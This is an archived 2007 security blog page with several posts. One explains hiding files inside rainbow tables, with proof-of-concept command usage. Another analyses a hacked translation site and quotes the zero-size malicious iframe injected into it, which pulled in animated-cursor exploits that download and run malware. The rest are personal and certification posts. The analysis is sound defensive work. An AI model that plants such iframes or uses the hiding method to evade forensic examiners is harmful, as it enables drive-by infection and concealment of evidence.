Didier Stevens

Monday 30 April 2007

Hiding Inside a Rainbow

Filed under: Hacking — Didier Stevens @ 16:43

Steganography is the art of hiding messages so that the uninitiated do not suspect the presence of a message. A rainbow table is a huge binary file used for password cracking. This is the first in a series of posts on research I’ve done on how to hide data in rainbow tables, and how to detect its presence.

There are several steganography algorithms to hide data in pictures. They often involve changing the least-significant bits of the numbers representing the color or another visual property of a pixel. This minute difference cannot be perceived by the naked eye, but it is there. The size of the data you can hide in a picture is limited by the size of the picture and by the number of bits involved in the steganography algorithm. It’s impossible to hide large files, like audio or video files, in a picture, unless you split the files and use a lot of pictures. To hide a large amount of data in a single file, you need a large file.

Rainbow tables are huge, usually 1 to 2 GB. I’ve generated a set of LM-hash rainbow tables that is 23 GB. So there should be enough space to hide a large amount of data. The software I’ve used in my research is from Project RainbowCrack. All tables used in my research were generated with this software.

The first method to hide data with a rainbow table is trivial: rename the file you want to hide so that it carries the name of a rainbow table, such as lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt

But this method will not withstand even a superficial inspection of the file. A forensic analyst will see through your subterfuge: by looking at the content of the file she will recognize the format of the media file you’ve renamed and realize that it’s not a rainbow table.

So how can you hide data in a real rainbow table? Let’s look at the structure of a rainbow table.

A rainbow table is just a sequence of records. Each record has 2 fields of 8 bytes each, which makes a record 16 bytes wide. Therefore the size of a rainbow table is a multiple of 16. A record represents a chain. The first field is the password that started the chain. Actually, the first field is an index into the keyspace of all possible passwords for the given rainbow table set. It is a random number between 0 and the size of the keyspace minus 1. The second field is the hash of the last password in the chain (actually, this is also an index and not the real hash). The rainbow table is sorted on the second field: the record with the lowest hash is first in the table and the one with the highest hash is last.
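The record layout described above can be sketched in a few lines of Python. This is only an illustration, not code from Project RainbowCrack: the function names are hypothetical, and it assumes both 8-byte fields are stored as little-endian unsigned integers.

```python
import struct

RECORD_SIZE = 16  # two 8-byte fields per chain: start index, end index


def read_chains(data: bytes):
    """Split raw table bytes into (start, end) tuples.

    Assumption: both fields are little-endian unsigned 64-bit integers.
    """
    if len(data) % RECORD_SIZE != 0:
        raise ValueError("table size is not a multiple of 16 bytes")
    return [
        struct.unpack_from("<QQ", data, offset)
        for offset in range(0, len(data), RECORD_SIZE)
    ]


def is_sorted_on_end(chains) -> bool:
    """Check that the table is sorted on the second (end) field."""
    return all(a[1] <= b[1] for a, b in zip(chains, chains[1:]))
```

A file whose size is not a multiple of 16, or whose second column is not sorted, fails this basic structural check, which is why a simply renamed media file is easy to spot.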


This is the hex dump of a rainbow table (the first 16 chains). The green box highlights the random data; notice that the 3 most-significant bytes are 0. The blue box highlights the hash; notice that this column is sorted.

My second method will modify a real rainbow table to hide a file.

Because the first field is just a random number, we can replace it with our own data from the file we want to hide. We cannot use all the bytes in this field, because the keyspace usually needs fewer than 8 bytes: the most-significant bits of the password field are zero, and setting them to one would give our secret away. We must limit our usage of the password field to the least-significant bytes. Changing these bytes will not change the structure of the rainbow table, so it will still appear as a valid rainbow table. The only consequence of our change is that the modified chain can no longer be used to crack a password. But if we leave a certain percentage of chains in the rainbow table unchanged, the rainbow table can still be used to crack some passwords.
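As a rough sketch of this idea (not the PoC code mentioned later in this post), the following Python functions overwrite the low-order bytes of each start field and read them back. The names hide and reveal are hypothetical, and the sketch assumes the fields are little-endian, so that the least-significant bytes are the first bytes of each 16-byte record.

```python
RECORD_SIZE = 16  # 8-byte start field followed by 8-byte end field


def hide(table: bytes, payload: bytes, first_chain: int, bytes_per_chain: int) -> bytes:
    """Return a copy of the table with the payload written into start fields.

    Assumption: little-endian fields, so the least-significant bytes of the
    start field are the first bytes of the record.
    """
    if not 1 <= bytes_per_chain <= 8:
        raise ValueError("bytes_per_chain must be between 1 and 8")
    chains_needed = -(-len(payload) // bytes_per_chain)  # ceiling division
    if (first_chain + chains_needed) * RECORD_SIZE > len(table):
        raise ValueError("payload does not fit in the table")
    out = bytearray(table)
    for i in range(chains_needed):
        chunk = payload[i * bytes_per_chain:(i + 1) * bytes_per_chain]
        offset = (first_chain + i) * RECORD_SIZE
        out[offset:offset + len(chunk)] = chunk  # end field stays untouched
    return bytes(out)


def reveal(table: bytes, first_chain: int, bytes_per_chain: int, size: int) -> bytes:
    """Read back `size` hidden bytes written by hide()."""
    chains_needed = -(-size // bytes_per_chain)
    if (first_chain + chains_needed) * RECORD_SIZE > len(table):
        raise ValueError("table is too small for the requested size")
    out = bytearray()
    for i in range(chains_needed):
        offset = (first_chain + i) * RECORD_SIZE
        out += table[offset:offset + bytes_per_chain]
    return bytes(out[:size])
```

With 4 bytes per chain, a 32-byte payload occupies exactly 8 chains; the end fields and all later chains are left as they were, so the table stays sorted.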

To illustrate the technique, we insert 32 bytes (the sequence from 0x00 through 0x1F) in this rainbow table:


We will replace the random bytes in the red box. The keyspace of this rainbow table is below the 5-byte maximum (0xFFFFFFFFFF), which is why I decided to change only the 4 least-significant bytes of the start of each chain. This is the result:


This modification is obvious when you look at it, because the start entries are not random anymore. But if you use data that looks random (using compression or encryption), it will not stand out from the other random bytes. You can even use this modified rainbow table to crack passwords. The first 8 chains will not crack passwords anymore, because the start of each chain has been changed. But this does not cause an error and all the other chains are still usable. The only way to detect the hidden bytes (other than statistical analysis) is to recalculate the chain and compare the calculated hash with the stored hash. If they differ, the start has been tampered with. You can do this with the rtdump command, like this:

rtdump lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt 0

If the chain has been modified, the message will be:


The problem with this test is that it is very time-consuming: checking a complete rainbow table takes about as much time as calculating the rainbow table, because you’re in fact recalculating all the chains. FYI, each 1 GB table from my set took about 1 week to generate.

You can find PoC code to store and retrieve data in rainbow tables here in this ZIP file.

Use rthide to hide data in a rainbow table. It takes 5 arguments:

  • the rainbow table (remains unchanged)
  • the file to hide (remains unchanged)
  • the new rainbow table
  • the number of the first chain where we will start replacing the random start bytes
  • the number of bytes per chain we replace

To hide a file data.zip at the start of a rainbow table called lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt, using only 4 bytes per chain, use this command:

rthide lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt data.zip  lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt.stego 0 4

This will create a new rainbow table called lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt.stego

Use rtreveal to extract data from a rainbow table. It takes 5 arguments:

  • the rainbow table
  • the file to create
  • the number of the first chain where the hidden data starts
  • the number of bytes per chain that were replaced
  • the size of the hidden file

To extract the data, issue this command (you have to know the length of the hidden file; my PoC program doesn’t store it):

rtreveal lm_alpha-numeric-symbol14-space#1-7_0_5400x67108864_0.rt.stego data.zip 0 4 1620

1620 is the length of file data.zip

You can store a huge amount of data in a couple of minutes with this technique: in a 1 GB rainbow table, you can hide a 256 MB file using 4 bytes per chain. There is a way to detect the hidden data, but at a significant cost.
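The 256 MB figure follows directly from the record size: a 1 GB table holds 67108864 chains of 16 bytes, and each chain carries 4 hidden bytes. A small helper (the name capacity is just for illustration) makes the arithmetic explicit:

```python
RECORD_SIZE = 16  # bytes per chain


def capacity(table_size: int, bytes_per_chain: int, first_chain: int = 0) -> int:
    """Number of bytes that can be hidden in a table of the given size."""
    chains = table_size // RECORD_SIZE
    usable = max(chains - first_chain, 0)
    return usable * bytes_per_chain


one_gb = 1 << 30
print(one_gb // RECORD_SIZE)           # 67108864 chains
print(capacity(one_gb, 4) // (1 << 20))  # 256 (MB)
```

Skipping chains at the start, or leaving a percentage of chains untouched so the table still cracks some passwords, lowers the capacity proportionally.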

Stay tuned for posts about other techniques to hide data in rainbow tables.

Monday 23 April 2007

USBVirusScan V1.5.0

Filed under: My Software,Update — Didier Stevens @ 18:44

This new version of USBVirusScan adds a switch (-q) to stop a running instance of USBVirusScan.

The program can be found here.

Thursday 19 April 2007

How did you get your start?

Filed under: Personal — Didier Stevens @ 13:15

In response to Ron Woerner’s “tag”, here is an out-of-cycle blog post on how I got into computers.

I must have been around 10 years old when I started to play with tape decks, radios, speakers, microphones, telephones, … I would connect them together in various ways and observe the results. This led to my first hack: I discovered that I could use a speaker as a microphone! Thrilled that I could discover things on my own, and that it’s possible to use electronic appliances for purposes other than those they were designed for, I started to experiment and have been busy ever since.

I was 12 when I programmed my first computer. My parents bought our first game console, the Philips Videopac G7000. It used cartridges to play games, and I had asked for a computer programming cartridge. This cartridge used a virtual assembly language, and I started to write small programs with simple animations and sounds, but I soon ran into the limits of this platform (memory and no way to save the programs).

My next computer was a ZX81 that I programmed in Basic, but again, I soon ran into the limits of this platform.

Then came my Apple IIe with floppy disk drives. My parents had to take out a loan to buy it, and I’ve always been grateful that they went to such lengths, because my Apple has been instrumental in my development as a programmer, electronic engineer and hacker. I started in Basic, and then in machine language (6502) for performance. And it really was machine language, not assembly language (I had no assembler when I started). I wrote my programs on paper sheets in opcodes, and then manually translated them to hexadecimal code. That’s when I really began to understand how computers worked, and I also started to reverse the monitor, the Apple DOS and other programs and started to hack. I was a big Ultima player, but I found the levelling of characters boring. So I discovered how to change the saved data and patch the program to become invincible.
The Apple IIe was also a dream machine for hardware hacking. It had a bus with slots where I could plug in cards I had soldered together. I made several I/O cards (TTL input/output, and A/D and D/A converters).

I obtained an account on a Unix HP9000 machine when I started my electronic engineering studies. That’s when I was first introduced to computer security. A multi-user, multi-tasking operating system that upholds the CIA tenet requires user accounts, passwords, file permissions, … I needed to understand how this worked, how they pulled it off to implement these security mechanisms on a computer. And after I started to really understand this, I soon discovered ways to work around it.
This is also the time when I learned about the human aspect of security. Our Unix computer also ran the local school BBS. I found out that the BBS passwords were less protected than the Unix passwords, and, most importantly, that students often used the same password for both systems.

Then, in 1991, I started working for the Belgian Telco (called RTT back then, now it’s Belgacom). It was a very interesting job: I had to program AutoCAD in Lisp to make drawing programs for telephony cable schematics. We used high-end PCs with DOS as CAD stations. They were not networked together. The only security issue we had was the occasional virus on a floppy.

It’s from 2000 on, when I left Belgacom and joined Contraste Europe, that I started to get involved in IT security. I started with technical aspects of security; for example, I worked on a back-end system developed with Microsoft technology (VB, ASP and MS-SQL), which had its own authentication and authorization mechanism. Later I became more involved with non-technical elements of the security process, like policies.

Thanks Ron for this opportunity to take a walk down memory lane. I hope that the following people, whom I challenge to write a blog post on how they got started, also enjoy writing about their start:

Monday 16 April 2007

About the strategy I followed during my CISSP exam

Filed under: Certification — Didier Stevens @ 8:54

In a previous CISSP exam post I promised to blog about the exam-taking strategy I followed.

The CISSP examination consists of 250 multiple-choice questions with 4 choices each. You probably know that it’s a form-based exam: you don’t get to sit in front of a computer to take the exam, but you get a booklet with questions and a form you have to complete with your answers using a number 2 pencil. You’re allowed to write on the pages of the booklet.

Here is how I tackled my 250 questions.

I read the first question. If I don’t understand the question, or if I don’t like the question, or even if I don’t feel like answering the question right now, I just move on to the next question. However, even if I skip a question, when I’m certain that one or more of the answers are not correct, I cross them out (every time I say I write something down or make a mark, I do it on the question booklet, unless stated otherwise).
If I try to answer the question but I’m not sure of the right answer, I will cross out the incorrect answers and move on to the next question.
If I answer a question I’m sure about, I put a circle around the number of the question and another one around the letter of the correct answer.

After tackling the last question, I just start the process again from the beginning, skipping the questions I already answered (remember, there’s a circle around the number of an answered question). I repeat this process several times, each cycle gives me more answers. After 3 hours, I’ve answered about 80% of the questions and I decide to transcribe my answers to the form (I have to be careful to skip the unanswered questions on the form). I review each answered question and transcribe the correct answer to the form. At the same time, I compile a list of all unanswered questions.
I decided to transcribe the answers after completing about 80% because:
1) I want to take the time to correctly transcribe the answers; I don’t want to make mistakes by rushing the job at the end of the 6-hour period allowed for the exam
2) I don’t want to start second-guessing my answers

After 45 minutes, I’ve transcribed all answered questions.

Now I focus on the list of remaining questions. I try to answer each question by eliminating all incorrect answers: what remains must be the correct answer. If more than one answer remains, I select one at random. I start guessing because I don’t want to stay until the end of the exam trying to find the correct answers; I feel confident because of all the other questions I answered. Since a wrong answer does not impact your score, you’re better off answering all questions than leaving some unanswered. Finally, I transcribe the remaining answers to the form. The list of remaining questions I compiled helps me to identify which answers remain to be transcribed.

The complete process took about 4 hours. And I don’t want to do it again, so I’ll do whatever is necessary to earn the 120 CPE credits for my recertification.

In the days following the exam, you’ll start to doubt some of the answers you gave. I looked up several questions and discovered I answered them incorrectly. But don’t despair: your memory is biased, and you’re focusing on the wrong answers and not on all the correct ones you gave.

Tuesday 10 April 2007

And This Time, The Vector Is… The Animated Cursor, Again

Filed under: Malware,Vulnerabilities — Didier Stevens @ 8:36

Microsoft Security Bulletin MS05-002 did not patch all vulnerabilities in animated cursors. More than 2 years later, Microsoft had to patch again.

I saw several animated cursors with shell-code last week; here’s an interesting case.

http://www.reverso.net is an online translation website. The site was compromised: criminals inserted this iframe in the main page:

<iframe src=http://www.worldaofwr.net/jw/index.htm width=0 height=0>

An iframe element is like an include statement: the browser will include the source to render the page you’re viewing. Notice that the dimensions of the iframe are zero, so it will be invisible. Inserting an iframe pointing to a malicious website is a method of choice for compromising websites.

As of this writing, Reverso has removed the iframe from their website (I did inform them).

Here’s the cleaned up page from the malicious website, referenced by the iframe:


The JavaScript in this page will check if you’re using Internet Explorer version 6 or 7, and if you are, it will fingerprint your OS. Are you using Windows 2000, XP or 2003? If you’re using XP, it will use an animated cursor named pay.mid, and if you’re using 2000, it will use another animated cursor named 7517.jpg.

I can see only one reason why the programmer would code this test to send you a cursor, aside from ignorance, and that is to keep a low profile. Because exploiting the animated cursor vulnerability does not crash your browser or generate errors you might notice, the malware programmer could just send you all the cursors he has, and hope that one of them is the right exploit for your machine. But sending several malicious payloads increases the chance that the malware gets detected by an IDS or AV.

In this case, your machine cannot be infected when you’ve disabled scripting. But the programmer could have used server-side scripting instead of client-side scripting, because your browser sends a User-Agent string, which tells the server exactly which browser you’re using and on which OS. Disabling scripting in your browser will not stop server-side scripting.
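To show how much a User-Agent string gives away, here is a minimal Python sketch that extracts the Internet Explorer major version and the Windows version from it. The function name and the mapping table are my own illustration; the only facts relied on are that IE announces itself as "MSIE x.y" and that Windows 2000, XP and Server 2003 report "Windows NT 5.0", "5.1" and "5.2".

```python
import re

# Windows NT version tokens as they appear in User-Agent strings
NT_VERSIONS = {
    "5.0": "Windows 2000",
    "5.1": "Windows XP",
    "5.2": "Windows Server 2003",
}


def fingerprint(user_agent: str):
    """Return (browser, os_name) guessed from a User-Agent string.

    Either element is None when the corresponding token is absent
    or not in the (deliberately small) mapping above.
    """
    ie = re.search(r"MSIE (\d+)\.", user_agent)
    nt = re.search(r"Windows NT (\d+\.\d+)", user_agent)
    browser = f"IE {ie.group(1)}" if ie else None
    os_name = NT_VERSIONS.get(nt.group(1)) if nt else None
    return browser, os_name


print(fingerprint("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"))
```

Any web server, or anyone reading its logs, can do the same; no client-side script is needed.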

The animated cursor is downloaded by your browser through a DIV element with a CSS style defining a cursor. Notice that the file extension of the downloaded cursor is .MID or .JPG, not .ANI. Apparently, this is no problem for Internet Explorer; it just assumes the file is an animated cursor. But the malware author has done this to try to stay below your radar. MID is an extension for music files, JPG is an extension for pictures. Many AVs are configured not to scan multimedia files for performance reasons, so the exploit in the cursor might go undetected by using a multimedia file extension. Or if you have blocked ANI files on your proxy, these files will get through if you allow .MID and .JPG.

Let’s look inside the animated cursor pay.mid. It’s very small, just 801 bytes. A quick way to look inside is to dump the strings, like this: strings pay.mid.
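One way to avoid being fooled by the extension is to look at the first bytes of the file instead. An animated cursor is a RIFF file with form type ACON, a standard MIDI file starts with MThd, and a JPEG starts with the bytes FF D8 FF. The Python sketch below (function names are hypothetical) flags a file whose extension does not match its content:

```python
import os


def sniff(header: bytes) -> str:
    """Guess the file type from the first 12 bytes of a file."""
    if header[:4] == b"RIFF" and header[8:12] == b"ACON":
        return "ani"
    if header[:4] == b"MThd":
        return "mid"
    if header[:3] == b"\xff\xd8\xff":
        return "jpg"
    return "unknown"


def extension_mismatch(filename: str, header: bytes) -> bool:
    """True when the content is recognized and disagrees with the extension."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext == "jpeg":
        ext = "jpg"
    kind = sniff(header)
    return kind != "unknown" and kind != ext
```

A file named pay.mid whose header reads RIFF….ACON would be reported as a mismatch, whatever the proxy or AV extension filter thinks of it.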

cmd >
/c "
T}      >

And here we see a URL pointing to an executable. You don’t have to be a reverse engineer to understand that the shell-code in this animated cursor will download and execute the executable. And you don’t have to be an IT security expert to know that the downloaded executable is malware.
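If you don’t have the strings command at hand, a few lines of Python do roughly the same job: they list every run of at least 4 printable ASCII characters in a file. This is a simplified stand-in, not a reimplementation of the real tool, and the function name is my own.

```python
import re


def strings(data: bytes, min_len: int = 4):
    """Return runs of printable ASCII characters of at least min_len bytes."""
    pattern = rb"[ -~]{%d,}" % min_len  # space (0x20) through tilde (0x7e)
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


sample = b"\x00\x01cmd /c test\x00ab\x00hello\xff"
print(strings(sample))  # ['cmd /c test', 'hello']
```

To use it on a file, read the file in binary mode and pass the bytes to strings().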

Monday 2 April 2007

Digital Self Defence

Filed under: Vulnerabilities — Didier Stevens @ 8:49

I’m back from Black Hat Europe 2007. Black Hat’s theme is “Digital Self Defence”, and that is just what I did. Because I took a reverse engineering training by Halvar Flake, I had to take my Windows laptop with me. Here I explain how I protected my Windows laptop when accessing an insecure wireless network at the conference.

The threats I faced when enabling my wireless connection at the conference were:

  • someone compromising the integrity of my system
  • confidential data theft
  • credentials theft

In a normal situation I protect my OS and data with these procedures and tools:

  • keeping my OS and software patched
  • running McAfee Anti-Virus and keeping it updated
  • running Kerio’s free Personal Firewall
  • connecting to the Internet with a NAT router
  • using a WPA secured WiFi connection
  • using Firefox with NoScript and CookieSafe for web browsing
  • storing all my data in a TrueCrypt volume
  • making regular system backups with Acronis True Image on a dedicated USB hard disk
  • using a non-admin account

At home, before I left for the conference, I took a full backup of my laptop.

In the hotel, there was unencrypted, free WiFi available in the rooms and on the conference floor. My laptop has a (hardware) switch to disable WiFi. I would only switch it on when I really needed to access the Internet, and preferably in my hotel room on the 16th floor, not on the conference floor.

Each time I enabled WiFi access, I unmounted the TrueCrypt volume with all my data.

Whenever I accessed a website that needed credentials (like Gmail), I made sure that it used HTTPS or else I would use TOR as a proxy (I didn’t use TOR all the time because of the slow connection).

For the training, I installed a new virtual machine (with VMware), and installed all the software Halvar gave us and did all the exercises on this machine.

My hotel room had a laptop safe, and I would always store my laptop in it whenever I didn’t need it.

I didn’t notice an incident on my laptop when I was at Black Hat. But back home, I decided to restore my laptop, not because I feared my laptop was compromised, but mainly as an exercise to test my backup procedure.

Here is how I did it:

  1. make a new backup of my laptop, just in case the restore goes wrong
  2. copy my TrueCrypt volume with data and the training virtual machine to a USB hard disk, because I need to keep these
  3. restore the backup from before the conference
  4. copy my TrueCrypt volume with data from the USB hard disk back to the laptop

It took a long time, but the procedure is simple and everything went fine. I learned that Acronis True Image’s progress bar during the restore is confusing. The time remaining would increase, not decrease. At the end, it was 5 hours, and then Acronis True Image rebooted my laptop. Windows was running normally, and connected immediately to my WiFi network at home. All traces of the WiFi network at Black Hat were gone.

My laptop has forgotten it was at Black Hat Europe 2007.

The key ingredients of the restore procedure are:

  • a full system backup
  • a clear separation of system files and data files

Sunday 1 April 2007

Good Bye Security Monkey!

Filed under: Nonsense — Didier Stevens @ 16:25

Now that Security Monkey has announced his retirement from the blogosphere, I can reveal his true identity:

